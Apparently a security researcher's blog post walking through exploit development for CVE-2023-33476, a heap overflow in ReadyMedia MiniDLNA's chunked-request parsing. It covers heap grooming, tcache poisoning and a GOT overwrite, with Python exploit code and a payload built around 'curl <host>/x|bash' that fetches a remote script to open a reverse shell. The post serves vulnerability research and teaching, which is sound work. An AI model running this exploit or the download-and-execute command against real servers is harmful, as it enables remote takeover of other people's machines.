hyprblog

chonked pt.2: exploiting cve-2023-33476 for remote code execution

2023-06-19T00:00:00+00:00

This is the second part of the two-part series covering a heap overflow I found in ReadyMedia MiniDLNA (CVE-2023-33476). This post will focus on the exploit development side of things, going over the various challenges that had to be overcome and how everything was put together to achieve remote code execution and pop a reverse shell using a tcache poisoning attack. Check out the first post for an in-depth root cause analysis and overview of the vulnerability.

Introduction

Before diving into the details of the vulnerability and the exploit, it’s worth taking a moment to go over the basics of how chunked requests work and the fundamentals of the bug.

Disclaimer: this is a pretty long post and there may be a few details I might have missed, but I’ve tried to include as much as possible to help it all make sense and help others who are trying to learn. If you find any glaring issues/mistakes please reach out to let me know and I’ll add any corrections needed.

If you just care about the code, you can find it here.

review of http chunked encoding

An HTTP request will set the Transfer-Encoding HTTP header to chunked to indicate to the server that the body of the request should be processed in chunks. The chunks follow a common encoding scheme: a header containing the size of the chunk (in hex) followed by the actual chunk data. As this is HTTP, the character sequence \r\n serves as delimiter bytes between chunk size headers and chunk data. The last chunk (terminator chunk) is always a zero-length chunk.

A typical request using chunked encoding will look something like this:

POST /somepath HTTP/1.1
Transfer-Encoding: chunked

4
AAAA
10
BBBBBBBBBBBBBBBB
0

The request above contains two chunks: one 4-byte chunk and one 16-byte chunk (chunk sizes are parsed as hex), followed by the zero-length terminator chunk. The server will parse the chunk sizes and use this to construct a single blob of data composed of the concatenated chunk data, minus the size metadata.
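To make the encoding concrete, here is a minimal Python sketch of an encoder and a well-behaved decoder for chunked bodies. The function names are my own for illustration and are not taken from MiniDLNA; note that on the wire each chunk's data is also followed by \r\n.

```python
def encode_chunked(chunks):
    """Encode a list of byte strings as an HTTP/1.1 chunked body."""
    body = b""
    for data in chunks:
        # size line: chunk length in hex, terminated by CRLF
        body += b"%x\r\n" % len(data)
        # chunk data, also terminated by CRLF
        body += data + b"\r\n"
    # zero-length terminator chunk
    return body + b"0\r\n\r\n"


def decode_chunked(body):
    """Concatenate the chunk data, dropping the size metadata."""
    out = b""
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol], 16)
        if size == 0:
            return out
        start = eol + 2
        out += body[start:start + size]
        # skip the chunk data and its trailing CRLF
        pos = start + size + 2
```

Unlike the vulnerable code discussed in this post, this decoder builds a new buffer and relies on Python's slicing, so an oversized chunk length simply yields less data rather than touching neighboring memory.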

summary of the bug and initial primitive

Let’s review the fundamentals of the bug and the primitives provided. The relevant snippet of code that triggers the memory corruption as a result of the bug is shown below.

    char *chunkstart, *chunk, *endptr, *endbuf;

    // `chunk`, `endbuf`, and `chunkstart` all begin pointing to the start of the request body
    chunk = endbuf = chunkstart = h->req_buf + h->req_contentoff;

    while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
    {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        {
            Send400(h);
            return;
        }
        endptr += 2;

        // this call to memmove will use the chunk size parsed by strtol() above
        memmove(endbuf, endptr, h->req_chunklen);

        endbuf += h->req_chunklen;
        chunk = endptr + h->req_chunklen;
    }

To recap the important details:

strtol() is used to parse the HTTP chunk size from the body of the request (which we fully control). The value returned by strtol() is saved to h->req_chunklen.
h->req_chunklen is used as the size argument in a call to memmove() without bounds-checking.
The dest and src arguments passed to memmove() are both pointers into the request buffer; in theory, they should point to the first digit of the chunk size and the first byte of the actual chunk data that follows the chunk size, respectively.
The request buffer containing our data is allocated on the heap.

Due to the missing bounds-check in the code above (and the broken validation logic that is the root cause of the issue), the bug provides an OOB read/write primitive of arbitrary size. At this point, I still had almost no control over what gets written and where it’s written to. Since the corruption occurs on data allocated on the heap, this introduced the option to either attack the application data directly or target the heap metadata to derive more powerful primitives.

Understanding the Corruption Mechanism

NOTE: all references to “chunks” in the sections below are referring to HTTP chunks, not heap chunks.

effects of `memmove()`

We’ll start with the detail that had the most impact on developing the exploit: the use of memmove() to concatenate the end of one HTTP chunk to the next. Each iteration through the while loop in the code snippet above is meant to process a single HTTP chunk from the body of the request; assuming multiple chunks are present (which is always the case for valid requests) the code needs to concatenate the beginning of the chunk it is processing to the tail end of the chunks that have already been processed and remove the chunk size metadata between them. The application does this in-line within the same buffer instead of creating a new allocation to hold the final blob of data; it selects the range of bytes pertaining to the current chunk being processed based on the chunk size it finds in the request and will then ‘left-shift’ those bytes x bytes lower in memory, where x is the total length of the chunk size field (i.e. strlen(chunk_size_line)).

In practical terms, this introduces the following conditions and constraints:

As we can only control the size and not the location of the r/w, we are only able to r/w higher into memory relative to the location of the chunk in the buffer allocated for the request
The number of bytes the data will be left-shifted by is determined by the distance between the dest and src args passed to memmove() (endbuf and endptr respectively in the snippet of the vulnerable code above)

visualizing the operation

This particular aspect of the bug and the impact it has on exploitation isn’t very intuitive (at least not to me) so it may be useful to try to visualize it. I created the graphic below using Google Sheets (lol) while working on the exploit to help me grok the details so I’m hoping it’s useful here.

The before and after rows below represent a contiguous chunk of memory containing the contents of an HTTP request before and after the memmove() operation using the chunk size at the beginning of the request data (23). We can imagine that the row of bytes is a ribbon on a fixed track; by “pulling” on the left side of the ribbon starting at read_src, we can shift the bytes to the left toward us (we’re fixed at write_dest). There isn’t a limit to how much data to the right of read_src we can shift left, but we can only shift by (read_src - write_dest) slots. The grid slots (i.e. addresses) are fixed, so if we want some payload to end up at a specific target address we need to be able to shift the bytes of that payload left by at least (target_addr - payload_addr).

To break it down:

The cells with the red border show the bytes that would be selected by a chunk size of 23 (as seen at the beginning of the row)
The location where memmove() will write the bytes to is highlighted in green (endbuf ptr passed as first arg)
The location where memmove() will start reading from is highlighted in purple (endptr ptr passed as the second arg)

Extrapolating from the examples above, we can see that changing the chunk size alone will have virtually 0 impact on where the data is written relative to our target — larger sizes will reach further into memory but will result in those bytes being shifted by the same distance, which means for a given target at address x and payload data at x+20, selecting bytes up to x+20 or x+100 will result in the same bytes being written to x after the call to memmove().
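The same observation can be checked with a small Python model of one loop iteration. This is a simplified sketch: the regex only approximates strtol() (no sign or 0x prefix handling), a bytearray stands in for process memory, and the PAYL marker and its offsets are made up for the demo.

```python
import re


def vulnerable_step(mem, chunk, endbuf):
    """Model one iteration of the chunk loop; returns the shift distance."""
    # strtol(): skip leading whitespace, then consume hex digits
    m = re.match(rb"\s*([0-9a-fA-F]+)", mem[chunk:])
    if m is None:
        return None
    size = int(m.group(1), 16)
    # strstr(endptr, "\r\n") followed by endptr += 2
    endptr = mem.find(b"\r\n", chunk + m.end())
    if size <= 0 or endptr < 0:
        return None
    endptr += 2
    # the model's "memory" must be large enough to read from
    assert endptr + size <= len(mem)
    # memmove(endbuf, endptr, size): the slice on the right is a copy,
    # so overlapping ranges behave like memmove
    mem[endbuf:endbuf + size] = mem[endptr:endptr + size]
    return endptr - endbuf


def demo(size_line):
    """Place a marker at a fixed offset and report where it lands."""
    mem = bytearray(size_line + b"." * 60)
    mem[20:24] = b"PAYL"
    shift = vulnerable_step(mem, 0, 0)
    return shift, mem.find(b"PAYL")
```

Calling demo(b"17\r\n") and demo(b"20\r\n") moves the marker by the same 4 bytes in both cases: a larger chunk size selects more bytes but does not change where any given byte ends up.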

controlling the shift distance

As mentioned in the previous section, the distance the selected byte-range is shifted by is determined by the number of bytes between the pointer where the bytes will be written (endbuf) and the pointer where data will be read from (endptr). Based on the parsing logic, this ends up being the number of bytes between the first byte of the chunk size in the request body and the location where the first byte of actual chunk data is expected to be. In the code, this is done by passing a pointer &endptr as the second arg to strtol() when parsing the chunk size value from the request to have strtol() store the location of the first non-parsable value it encounters to this pointer. In a normal request, this would be the \r that comes immediately after the chunk size. The code checks for the presence of \r\n starting at the value saved to this pointer to confirm this sequence is in fact present and if found increments it by 2 to move it past those characters. The pointer would then presumably point to the start of the actual chunk data.

The relevant code is shown again here:

  while ((h->req_chunklen = strtol(chunk, &endptr, 16)) > 0 && (endptr != chunk) )
  {
        endptr = strstr(endptr, "\r\n");
        if (!endptr)
        { ... }
        endptr += 2;

        memmove(endbuf, endptr, h->req_chunklen);
...

This means that in order to gain control over that distance, it’s necessary to introduce additional bytes between the two pointers without causing strtol() to stop parsing prematurely. Taking a look at the manpage for strtol(), the following line caught my attention:

The string may begin with an arbitrary amount of white space (as determined by isspace(3)). […] The remainder of the string is converted to a long value in the obvious manner, […]

By prepending the chunk size value with whitespace, it’s possible to introduce a nearly arbitrary number of bytes in order to affect the distance between endbuf and endptr when memmove() is called. Alternatively, prepending 0's to the chunk size achieves the same result.

example

This example shows a request where no leading whitespace has been added. At the first round of processing:

endbuf is at index/address 489
endptr is at index/address 493
Chunk size is 23, so 23 bytes will be shifted
(489 - 493 = -4), so each byte in the range of bytes to be shifted will shift -4 bytes down.
We want to overwrite 4 bytes starting at index 501 (cells highlighted in red)
The payload data we want to use for the overwrite starts at index 512 (cells highlighted in yellow)
Distance between overwrite target and overwrite data source is -11 bytes
The corruption does NOT successfully shift our overwrite data to the desired location

With the introduction of whitespaces prepended to the chunk size at the start of the request body:

endbuf is now at index 482
endptr is still at index 493
(482 - 493 = -11), so each byte in the range of bytes to be shifted will shift -11 bytes down.
We want to overwrite 4 bytes starting at index 501
The data we want to use for the overwrite starts at index 512
Distance between overwrite target and overwrite data source is still -11 bytes

Based on this, I concluded that it would be necessary to insert enough whitespace before the chunk size to make endbuf - endptr == overwrite_target - payload_data.
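As a rough sketch of that calculation, the helper below (a hypothetical name, not part of the published exploit) works out how many spaces to prepend so that the size line spans exactly the distance between the payload and the target. The indices in the usage note are the ones from the example above.

```python
def padded_size_line(chunk_size, target, payload):
    """Build a chunk size line whose length equals payload - target."""
    # required shift distance: how far the payload must move down
    shift = payload - target
    # unpadded size line, e.g. b"17\r\n"
    size_line = b"%x\r\n" % chunk_size
    pad = shift - len(size_line)
    if pad < 0:
        raise ValueError("payload is too close to the target for this size line")
    # strtol() skips the leading whitespace, but endbuf stays at its start
    return b" " * pad + size_line
```

For the example above, padded_size_line(0x17, 501, 512) yields seven spaces followed by 17\r\n, an 11-byte size line, which matches endbuf moving from index 489 down to 482 while endptr stays at 493.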

heap-based corruption

The corruption occurs on heap-allocated data, so it’s possible to corrupt the metadata of neighboring heap chunks. Based on the conditions described so far, it’s actually impossible to avoid corrupting at least the chunk that is immediately next to ours. This is because for a minimal request containing no data in the chunk fields (such as the request provided as an example at the beginning of this post) the memmove() operation is going to be performed on data near the end of the allocated buffer, overflowing into the next chunk almost immediately. While this introduces additional attack surface and exploitation options, it also adds some limitations, namely the need to bypass Glibc security and sanity checks so as to avoid abort()ing before the exploit finishes or triggering some other crash.

Heap Feng Shui

NOTE: references to “chunks” below are referring to heap chunks now, not HTTP chunks.

Given the heap-allocated buffers, we’ll focus on exploiting the heap directly (i.e. targeting heap chunk metadata). Heap-based exploits typically benefit from (or outright require) achieving some level of control over the layout of the heap in order to get target objects and payload data allocated at predictable locations. Based on conditions described above, this would be absolutely necessary for a successful exploit in this case. Specifically, it would be necessary in order to meet these requirements:

The overwrite target must be located higher in memory relative to where the request buffer used to trigger the corruption is located
The payload data used to overwrite the target address must be located higher in memory relative to the target address

Based on these requirements, the ideal memory layout would look something like this:

0x2000
---
	.....................
	...request_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

For this theoretical layout, we would then provide a chunk size large enough to traverse the overwrite_target and reach the last byte of the payload_data.

In practice, to achieve the layout above it’s necessary to:

Have controlled data allocated to the heap
Prevent the allocations from being free()’ed prematurely
Force allocations to happen sequentially or in a way that can be reliably predicted

controlling allocations

Unsurprisingly, the most straightforward way to force the application to make heap allocations with controlled data is by sending HTTP requests, so this can be used as an interface/proxy for malloc(). One important detail about this is that the request buffer allocations are done using realloc() rather than malloc() — requests that exceed 2048 bytes will result in the existing allocation being reallocated, which can affect the heap layout and result in heap chunks being freed unintentionally. We can avoid this issue entirely by keeping all requests below this size.

holding request allocations

The next requirement is almost more important than the first — the allocations containing our controlled data must remain allocated across multiple requests in order to successfully get the desired memory layout. This took a little bit of fiddling around but I eventually found an easy way to do this.

The code that handles the initial reading of the request data from the socket is shown below. After copying the data from the static buffer to the dynamically allocated buffer at h->req_buf, it searches for the presence of the sequence \r\n\r\n using strstr() to determine whether the entire contents of the HTTP headers have been received (the first occurrence of that sequence is expected to be the terminator for the headers).

        memcpy(h->req_buf + h->req_buflen, buf, n);
        // update req_buflen
        h->req_buflen += n;
        h->req_buf[h->req_buflen] = '\0';

        /* search for the string "\r\n\r\n" */
        // this is the mechanism used to determine where the end of the http
        // headers are since that should be the first occurrence of this string sequence
        // for a normal http request.
        endheaders = strstr(h->req_buf, "\r\n\r\n");

        if(endheaders)
        {
          h->req_contentoff = endheaders - h->req_buf + 4;
          h->req_contentlen = h->req_buflen - h->req_contentoff;
          ProcessHttpQuery_upnphttp(h);
        }

If this sequence is not found, the application will move on without entering the block where ProcessHttpQuery_upnphttp() is called above and wait for the client to send more data to complete the headers. This leaves the buffer at h->req_buf containing up to the first 2048 bytes of data sent allocated indefinitely until more data arrives on the socket or the connection is dropped by the client. By introducing a NULL byte anywhere before the first \r\n\r\n terminator in the request data sent it’s possible to force strstr() to terminate early and not find those characters. Alternatively, not including the terminator sequence at all will also result in the application assuming the client has not yet sent all headers and holding the allocation. We can then free() any allocation made this way by closing the socket used to initiate it.
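A minimal sketch of the second variant (never sending the header terminator) might look like the following. The request line, the X-Pad header, and both function names are placeholders I made up; only the absence of \r\n\r\n and staying under the 2048-byte realloc() threshold matter.

```python
import socket


def build_held_request(size=512):
    """Incomplete headers (no blank line), padded to exactly `size` bytes."""
    head = b"POST /hold HTTP/1.1\r\nX-Pad: "
    if not len(head) <= size < 2048:
        raise ValueError("size must fit the header and stay below 2048")
    # pad with a single long header value; no "\r\n\r\n" ever appears
    return head + b"A" * (size - len(head))


def hold_allocation(host, port, data):
    """Send the partial request and keep the socket open to pin the buffer."""
    sock = socket.create_connection((host, port))
    sock.sendall(data)
    # the caller closes this socket later to trigger the free()
    return sock
```

Keeping the returned socket object around is the whole point: the server-side buffer stays allocated until close() is called on it.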

getting sequential allocations

With the two previous steps figured out, it was then possible to start influencing the heap layout with sufficient control to start working on getting the allocations made in a predictable way in order to eventually set things up in an ideal way for the exploit. The first step was to identify where heap allocations happen along the execution path for request processing, their sizes, and whether they contained any data that may be interesting to target. After a bit of code review we can determine that, apart from the request buffer allocation (saved to h->req_buf), the only other relevant allocation that happens for each request is for a upnphttp structure, which stores the state, data, and metadata for the request being processed (saved to h). The pointer to the request buffer itself is stored inside the upnphttp structure.

I created the following GDB script to log every time either a request allocation or upnphttp struct allocation occurred and the addresses for the allocations.

set verbose off
gef config context.enable False

break upnphttp.c:1140
commands 1
    echo \n\n
    printf "============== Allocation for req_buf is at %p\n",h->req_buf
    echo \n\n
    printf "==============================================\n"
    continue
end

break upnphttp.c:118
commands 2
    echo \n\n
    printf "============== NEW upnphttp struct is at = %p\n",ret
    echo \n\n
    printf "==============================================\n"
    continue
end

run -R -f testing_tmp.conf -d

I wrote a Python script using raw sockets to start performing allocations for both the upnphttp structures and the request buffers and observing the addresses where the allocations occurred, using the method described in the previous section to keep the allocations held in memory across multiple requests. This took a bit of fiddling and playing with the order that connections were initiated in and when request buffers were allocated but I eventually found that after about 6-7 request buffer allocations (after having initiated the connections ahead of time) the buffers began getting allocated sequentially in memory.

separating the connection and request buffer allocations

Because the fields of the upnphttp structure are accessed throughout the code that handles request processing, it would be ideal to separate those allocations from the request buffer allocations so that the latter end up allocated sequentially, rather than having the upnphttp structures sandwiched between them. This can be accomplished by initiating the connections that will be needed before sending any data on the sockets — the upnphttp structures are allocated when the connection is received (in New_upnphttp(), called by ProcessListen() upon receiving a new connection) and will remain allocated as long as the connection is kept open, which allows us to send data asynchronously from when the connections are initiated.
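In Python, the "connect everything first, send later" ordering could be sketched as below. The helper names mirror the ones used in the exploit snippet later in this post, but their bodies are not shown there, so treat these as my guess at a minimal implementation rather than the actual code.

```python
import socket


def create_sockets(count):
    """Create `count` unconnected TCP sockets."""
    return [socket.socket(socket.AF_INET, socket.SOCK_STREAM) for _ in range(count)]


def connect_sockets(socks, ip, port):
    """Connect every socket before any data is sent, so the server
    allocates all upnphttp structs up front."""
    for sock in socks:
        sock.connect((ip, port))


def sendsocks(socks, data):
    """Send the same data on each socket, in order; each send should
    result in one request buffer allocation on the server."""
    for sock in socks:
        sock.sendall(data)
```

The order of the list matters: sockets are serviced in the order data is sent, so the tail of the list corresponds to the most recent request buffer allocations.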

the ol’ switcheroo - getting the corruption request inserted at the ‘top’ of the crafted heap

Taking another look at the ideal heap layout described above, here is what needs to be done to construct it using the techniques and information described so far:

Allocate the connection upnphttp structs that will be needed before sending any request data
Send request data on x of the allocated connections to reach the point where request buffer allocations start happening sequentially. The real ‘crafted heap’ starts here.
Send the request data for the request that will trigger the corruption (‘top’ of the crafted heap, at lower address)
Send request data to create another request buffer allocation of the same size as the previous one (the ‘middle’). Assume the overwrite target is the heap chunk metadata of this allocation.
Send the request containing the payload data that will be written to the target (‘bottom’ of the crafted heap, at higher address)

0x2000
---
	.....................
	...corrupt_buffer.... <-- the buffer that will be used to trigger the corruption
	.....................
	.....................
	...overwrite_target.. <-- the object/addr we want to overwrite with controlled data
	.....................
	.....................
	....payload_data..... <-- the controlled data we want to write at the overwrite_target
	.....................
---
0x2600

As can be seen, the request that is used to trigger the corruption must be sent before allocating the other buffers to have it allocated at a lower address relative to the others. This is a bit of an issue because sending the actual corruption payload first would either trigger a crash prematurely at worst (preventing anything else from being done) or get processed and result in the buffer being free()’d at best. After spending some time learning about the Glibc malloc implementation and heap exploitation in general, I chose to address this issue by using a ‘placeholder’ allocation in the place where the corruption buffer would need to be; that allocation then gets free()’d immediately before sending the actual corruption request, after the crafted heap has been set up. By making this placeholder allocation the same size as the corruption request allocation (rounded up to the actual malloc chunk size), making an allocation of that size immediately after it’s free()’d results in the same chunk being returned by malloc() due to its “first fit” design. This means that sending the actual corruption request after dropping the connection for the placeholder buffer (causing it to be free()’d) will result in the data for the corruption payload being allocated where we need it.

putting it all together

Having figured out everything covered in the previous sections, we now have everything we need to write an exploit. Before going into the meaty details, let’s take a moment to review. We can now:

Control when allocations (i.e. malloc calls) are made and control their size
Control when allocations are free()’d so we can keep buffers in place while we make other allocations
Have sufficient influence over the allocator to get it to start giving us allocations that are sequential in memory
Have the request buffer that will trigger the corruption allocated in an ideal location for exploitation

Exploit: Arbitrary R/W via Tcache Poisoning for RCE

Whew! That was a lot of background to cover but hopefully that will all help with making sense of the actual exploit. The sections below cover the specific exploit I wrote more directly, though I’ll avoid going into specifics like sizes and addresses since those are variable and not critical for understanding how the exploit works. The source code for the exploits has been heavily commented if you’re interested in more details.

The exploit performs a tcache poisoning attack in order to trick malloc into returning a pointer to an arbitrary location and achieve arbitrary read/write; it uses this to get a pointer to the Global Offset Table (GOT) and overwrite the entries for free() and fprintf() to point to system(). free() is targeted as it will be called for h->req_buf at the end of request handling, transforming the call from free(h->req_buf) to system(h->req_buf). The payload sent for the final allocation where the GOT is corrupted begins with a shell command that will download and execute a script from an attacker-controlled server and spawn a reverse shell.

setup: building the target

The exploit is written for a binary with only partial RELRO and no PIE; the address of system() in libc and the address of the GOT are assumed to be known. The binary is built on a Debian 11 VM using Glibc 2.31 (default version installed by OS).

# install deps
sudo apt install -y autoconf autopoint libavformat-dev libjpeg-dev libsqlite3-dev \
  libexif-dev libogg-dev libvorbis-dev libid3tag0-dev libflac-dev

git clone https://git.code.sf.net/p/minidlna/git minidlna-git
cd minidlna-git && git checkout tags/v1_3_2
./autogen.sh
./configure --enable-tivo CC=clang CFLAGS="-g -O0 -fstack-protector"
make minidlnad CC=clang CFLAGS="-g -O0 -fstack-protector"

This is the output of the checksec tool for the output binary:

-> % checksec ./minidlnad
[*] '/home/hyper/minidlna-1.3.2/minidlnad'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The server can be started using the following command:

sudo ./minidlnad -R -f minidlna.conf -d

tcache poisoning tl;dr

I’ll assume you have some background on heap exploit techniques so I won’t go super in-depth here, but if not I highly recommend the how2heap series on Github. It covers basically every known technique and has up-to-date examples for the latest Glibc versions. The explanation given below applies to Glibc ≤2.31; newer versions have some additional constraints and checks (such as the safe-linking pointer mangling added in 2.32) that will need to be bypassed.

At a high-level, a tcache poisoning attack abuses the behavior of the Glibc malloc implementation and how the tcache (per-thread free bins) entries are handled in order to trick the allocator into returning a pointer to an arbitrary location. The tcache uses bins with predefined sizes and inserts chunks into the appropriate bin based on a matching size. Chunks are inserted into the tcache bins in a LIFO manner and since the allocator doesn’t need to traverse the list of free chunks in both directions, it only keeps a singly-linked list using the fd fields of the free()’d chunks to keep track of them. By corrupting the fd pointer of a free’d chunk in a tcache bin for a given size, the allocator can be made to return the address stored in fd: once the corrupted chunk itself has been handed out, the next call to malloc() for that size returns whatever fd points to.
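The toy model below walks through that sequence in Python. It is a deliberately simplified sketch of a single tcache bin: it ignores the per-bin counts and every other check, and the chunk addresses and the 0x41f000 target are made-up values rather than anything taken from the real binary.

```python
class TcacheBin:
    """Toy model of one tcache bin: a LIFO singly-linked free list."""

    def __init__(self):
        self.head = None  # address of the most recently free'd chunk
        self.fd = {}      # models memory: chunk address -> stored fd pointer

    def free(self, chunk):
        # the free'd chunk's fd takes the old head, then becomes the head
        self.fd[chunk] = self.head
        self.head = chunk

    def malloc(self):
        chunk = self.head
        if chunk is not None:
            # the allocator trusts whatever value fd currently holds
            self.head = self.fd.get(chunk)
        return chunk


def poison_demo(target=0x41F000):
    """Replay the attack order: groom, corrupt, then allocate three times."""
    a, b, c = 0x1000, 0x1060, 0x10C0  # three sequential chunks (made up)
    tbin = TcacheBin()
    for chunk in (c, b, a):           # free'd in reverse, so `a` is on top
        tbin.free(chunk)
    corrupt_buf = tbin.malloc()       # corruption request lands in `a`
    tbin.fd[b] = target               # overflow rewrites the neighbor's fd
    tbin.free(corrupt_buf)            # request done, `a` goes back on top
    return [tbin.malloc() for _ in range(3)]
```

poison_demo() returns the corruption buffer's chunk, then the tainted chunk, then the target address, which is the order of allocations the exploit has to make.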

constructing the fake chunk for poisoning

Based on what’s needed for the tcache poisoning to work, we need to corrupt a heap chunk that’s already been free’d and this chunk needs to be located after the request buffer containing the payload that will trigger the corruption. The chunk that will be targeted is a request buffer, so we control its contents and can place the payload data we want written to the target location (the fd pointer) within it. One important thing to note is that because we free the chunk before corrupting it, the first 16 bytes of the data we send will be overwritten by free() to store the fd and bk pointers (though technically only the fd pointer is actually used by tcache), so the payload data sent is placed at a 16-byte offset into the buffer to avoid it being corrupted before we copy it over the target location.

The illustration below shows how this chunk would look before and after being free’d, with return_addr at the right offset to ensure it’s left intact.
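The same before/after effect can be sketched in a few lines of Python. This only models the user-data portion of the chunk; the function names, fill bytes, and addresses are illustrative assumptions. In the Glibc version used here, the second 8-byte slot (the bk position) is written with the tcache key rather than a real bk pointer, but either way the first 16 bytes are clobbered.

```python
import struct


def fake_chunk(target_addr, size):
    """User data for the sprayed chunk: 16 filler bytes, then the pointer."""
    body = b"\x11" * 16 + struct.pack("<Q", target_addr)
    # pad to the allocation size so it lands in the intended tcache bin
    return bytearray(body.ljust(size, b"\x00"))


def simulate_free(user_data, next_ptr, key):
    """Model what free() writes into the first 16 bytes of a tcache chunk."""
    user_data[0:8] = struct.pack("<Q", next_ptr)  # fd / next pointer
    user_data[8:16] = struct.pack("<Q", key)      # bk slot (tcache key)
```

After simulate_free() runs on a buffer built by fake_chunk(), bytes 16 to 24 still hold the packed target address, which is what later gets shifted over the fd field.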

heap preparation

The first step taken is to use the techniques described earlier in the post to set the heap up so that we can get allocations created sequentially and spray the fake chunks described in the previous section into those allocations to use them later.

    # * the socks at the end of this list should all be right next to each other
    # * we'll free these LIFO from the tail to ensure our next allocs for the corruption
    #   will come from those sequential chunks. we need at least 2-3 sequential chunks so we use
    #   a total of 10 allocations here

    # create and connect needed sockets before sending any data on any of them. This should
    # keep the allocations for the upnphttp structs separate from the request buffer allocations.
    GROOMING_ALLOCS = 10
    xpr(f"starting heap grooming round, using {GROOMING_ALLOCS} allocs...")
    dummies = create_sockets(GROOMING_ALLOCS)
    connect_sockets(dummies, server_ip, server_port)

    # This is the target address we want malloc to return after the chunk has been corrupted
    where = pwn.pack(target_addr, 64)

    # create the fake chunk described above. pad with 16 bytes to skip the first 2 8-byte fields
    # (fd, bk)
    pre_pad = b"\x11" * 16 # \x11 is arbitrary
    core = pre_pad + where

    # pad the end of the payload with enough bytes to meet the size needed for the target tcache bin
    # allocations need to be kept the same size because tcache bins must match exact sizes
    payload = pad(ALLOC_SIZE, core)

    # send the payload on all of the sockets we opened; this should result in 10 request buffer allocations;
    # the last 3-4 will be allocated sequentially.
    sendsocks(dummies, payload)

    # free the last 4 allocs we made in reverse order to add those chunks to the tcache bin for the matching size
    # so they're returned to us on the next allocations we make of the same size. by closing the sockets, we free
    # both the upnphttp structs and the request buffers they contain.
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()
    dummies.pop().close()

After this code runs and the last few allocations are dropped, those free’d chunks should look something like this in memory and should be in the tcache bin for the matching size (0x60):

poisoning the free’d chunk

Immediately after setting up the heap, the exploit then initiates a connection for the request that will be used to trigger the bug and corrupt the neighboring free’d chunk. The payload used to trigger the corruption is padded to match the size of the chunks we just free’d in the previous step so when the allocation is made, malloc() will return the last chunk that was inserted into the bin. Because the allocations were free’d in reverse order, the last chunk that was inserted into the corresponding tcache bin will be the top chunk shown in the illustration above (at the lower addresses), so that’s the chunk we’ll get back.

Assuming everything is set up correctly, the chunk for the corruption request and the target chunk will then look like this (the buffer containing the corruption payload highlighted in green). As can be seen, things are now set up in such a way that we should be able to use the OOB read to read past the end of the buffer containing the corruption payload and into the free’d chunk immediately after it. The free’d chunks still contain the return address payload we want to have written over the fd pointer of the same chunk, so we should be able to reach return_addr with the call to memmove() since we have full control over the len argument.

The write portion of the memmove() will then “slide” the selected region of bytes “up” (based on the illustration above) so that return_addr ends up overwriting fd 40 bytes below it. To accomplish this, the HTTP chunk size in the corruption payload is prepended with whitespace characters (~40) to ensure the bytes are shifted by the correct distance to align the write at the desired location as described in the “controlling the shift distance” section earlier in the post. Once this request has been processed, it will get free’d and inserted back into the same tcache bin ahead of the now-corrupted free’d chunk. Those free’d chunks will then look like this (note that the size, prev_size, etc values shown at the end of the corruption buf are from the chunk below it, showing where those values end up after the call to memmove()):

In order to get the tainted chunk returned to us (the middle one in the illustration), we’ll need to make at least 1 allocation of that same size before that and then the next allocation of that size will have malloc() return the pointer we wrote to fd back to us. In the case of the exploit, this will be the address of the Global Offset Table (GOT).

corrupting the GOT

After successfully tricking malloc() into returning a pointer to the GOT, the next step is to corrupt one (or more) of the entries contained within to achieve code execution. The most straightforward way to do this is to call system() and pass it a pointer to some data we control containing a string with the command we want to execute. Since we have full control over the content that’s written, the question is then to figure out which function(s) to corrupt. Because system() expects a single argument that’s a pointer to some string data, the function(s) we target must also take a char (or void) pointer for its first argument and that pointer has to point to data we control. Finally, the target function(s) need to be called at some point after we’ve corrupted the GOT but before any other GOT entries that we’ve corrupted are referenced, since this will almost certainly result in a crash.

Taking all of this into consideration, I eventually found the two functions that would be targeted: fprintf() and free(). The actual entry that produces the code execution is free() but because the minimum size needed for the request buffer is greater than 8 bytes and we can’t do partial writes into the request buffer, successfully corrupting free() also results in corrupting other GOT entries, including the one for fprintf(), so it needs to point to a valid function since it’s called at least once before the next call to free(). Corrupting free() is a logical option since it meets all of the requirements without any additional setup: it takes a single pointer argument and will be called and passed the pointer to our request buffer almost immediately after we corrupt the GOT, reducing the risk of other functions that have been corrupted being called and crashing the application prematurely. As a bonus, hijacking free() also helps us avoid triggering the sanity checks in Glibc that would trigger an abort() after we’ve corrupted the heap metadata.

Because free() (i.e. system() after the GOT is corrupted) will be called on the pointer to the GOT where we’re writing the fake entries to, we can insert the command string we want passed to system() right at the start of the buffer to have it executed. The code below shows the construction of the final payload containing the command to run and the fake GOT entries with the padding needed for the binary the exploit was written for (free() at GOT+0x40, fprintf() at GOT+0x50):

    # set up the command string that will be passed to system()
    staging_server_addr = f"{args.lhost}:{args.lport}"
    # command: e.g. `curl 192.168.1.8:8080/x|bash`
    command_str = f"curl {staging_server_addr}/x|bash".encode()
    command_padding = b""

    # the command must be shorter than 64 bytes so that at least one NUL byte
    # terminates it before the free() entry; the rest is padded with NULs
    OFFSET_TO_FREE = 64
    if len(command_str) >= OFFSET_TO_FREE:
        xpr("command string too long using provided args, offsets will fail. bailing...")
        sys.exit(1)
    command_padding = b"\x00" * (OFFSET_TO_FREE - len(command_str))
    command = command_str + command_padding

    # set up fake GOT table for the overwrite (note: this will need to be updated for binaries that have different offsets between the two)
    got_table = b""
    got_table += pwn.p64(args.system_addr) # free() entry
    got_table += pwn.p64(0x0) # pad
    got_table += pwn.p64(args.system_addr) # fprintf() entry

    final_payload = command + got_table

After the final payload above has been sent and the GOT has been corrupted, the next call to free() will actually be a call to system() and it will be passed the pointer where we just wrote the payload.
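To sanity check the layout without pwntools, the same payload can be rebuilt with the standard library and the offsets verified directly. This is a minimal sketch: `build_payload` is a hypothetical helper, the system() address is a placeholder, and the 0x40/0x50 offsets only apply to the binary the exploit was written for.

```python
import struct

OFFSET_TO_FREE = 0x40     # free() slot, relative to the pointer malloc() returns
OFFSET_TO_FPRINTF = 0x50  # fprintf() slot


def build_payload(command: bytes, system_addr: int) -> bytes:
    """Command string at offset 0, fake GOT entries at 0x40 and 0x50."""
    if len(command) >= OFFSET_TO_FREE:
        raise ValueError("command too long, no room for a NUL terminator")
    payload = command.ljust(OFFSET_TO_FREE, b"\x00")
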